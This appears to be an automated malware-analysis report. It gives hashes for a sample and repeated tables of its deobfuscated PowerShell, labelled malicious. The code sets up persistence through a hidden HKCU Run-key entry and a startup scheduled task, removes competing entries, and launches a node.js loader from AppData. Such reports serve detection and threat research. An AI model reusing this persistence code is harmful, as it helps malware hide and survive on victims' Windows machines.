|
Hash | Hash Value |
|---|---|
| MD5 | 5ac87547074076a728cff3f24877f9ed
|
| Sha1 | b54f7dd6f6244284abd56ca72708182edcd167d6
|
| Sha256 | aacef8dd915afad6ff230073d1742eafb5fc1b4482875c6ba5d2e0c3273f7346
|
| Sha384 | 6c3a4d7104dc96d29d398dde51c05aa78ad3bb7c47170dfdf1d1e9baa9965aa24d25242303b8b544967548afe4db4560
|
| Sha512 | 235e1cfcfc8d7b08256146226a2bb9a8f5a6eee886a0ec4127cbde0f66f8f55d2d009e1a81a0d34f586b1468b8d16edd528f35c6e1f8589c1c3e35e934364218
|
| SSDeep | 24:4et8DaDecMUyZkYkLMhM0H8VAbs9PJ7C1Q9KjaJvKpbDLMh/lahIa5Cf2HLRm:4eDecFy2DghM0H8GkV9Kja0p3ghAWwls
|
| TLSH | DD31231876A0DB3D41F2561F8DD796377C2A225531305B44B3BEC358FF4901E8296B96
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | /sc "onstart" "/rl" "highest" "/f" $regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" $pattern = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" $existingEntries = Get-ItemProperty -Path $regPath $existingEntries."PSObject"."Properties" | ForEach-Object if ($_."Name" -notin @("PSPath", "PSParentPath", "PSChildName", "PSDrive", "PSProvider")) { if ($_."Value" -like "*$pattern*") { Remove-ItemProperty -Path $regPath -Name $_."Name" } } $randomName = "rNprmwBkvu" $command = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\jonat\AppData\Local\nrHsSM\FhVmkEq.ps1" New-ItemProperty -Path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" |
| Deobfuscated PowerShell | = "Get-ItemProperty" -Path $regPath $existingEntries."PSObject"."Properties" | ForEach-Object if ($_."Name" -notin @("PSPath", "PSParentPath", "PSChildName", "PSDrive", "PSProvider")) { if ($_."Value" -like "*$pattern*") { Remove-ItemProperty -Path $regPath -Name $_."Name" } } $randomName = "rNprmwBkvu" $command = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\jonat\AppData\Local\nrHsSM\FhVmkEq.ps1" New-ItemProperty -Path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" |
| Deobfuscated PowerShell | -path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" |
| Deobfuscated PowerShell | -path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & c:/users/jonat/appdata/roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" |
| Deobfuscated PowerShell | -path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & c:/users/jonat/appdata/roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | /sc "onstart" "/rl" "highest" "/f" $regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" $pattern = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" $existingEntries = Get-ItemProperty -Path $regPath $existingEntries."PSObject"."Properties" | ForEach-Object if ($_."Name" -notin @("PSPath", "PSParentPath", "PSChildName", "PSDrive", "PSProvider")) { if ($_."Value" -like "*$pattern*") { Remove-ItemProperty -Path $regPath -Name $_."Name" } } $randomName = "rNprmwBkvu" $command = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\jonat\AppData\Local\nrHsSM\FhVmkEq.ps1" New-ItemProperty -Path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" Malicious |
5ac87547074076a728cff3f24877f9ed > [PowerShell Command] |
| Deobfuscated PowerShell | = "Get-ItemProperty" -Path $regPath $existingEntries."PSObject"."Properties" | ForEach-Object if ($_."Name" -notin @("PSPath", "PSParentPath", "PSChildName", "PSDrive", "PSProvider")) { if ($_."Value" -like "*$pattern*") { Remove-ItemProperty -Path $regPath -Name $_."Name" } } $randomName = "rNprmwBkvu" $command = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\jonat\AppData\Local\nrHsSM\FhVmkEq.ps1" New-ItemProperty -Path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" Malicious |
5ac87547074076a728cff3f24877f9ed > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | -path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" Malicious |
5ac87547074076a728cff3f24877f9ed > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | -path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & c:/users/jonat/appdata/roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" Malicious |
5ac87547074076a728cff3f24877f9ed > [PowerShell Command] > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | -path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & c:/users/jonat/appdata/roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js" Malicious |
5ac87547074076a728cff3f24877f9ed > [Deobfuscated PS] > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] |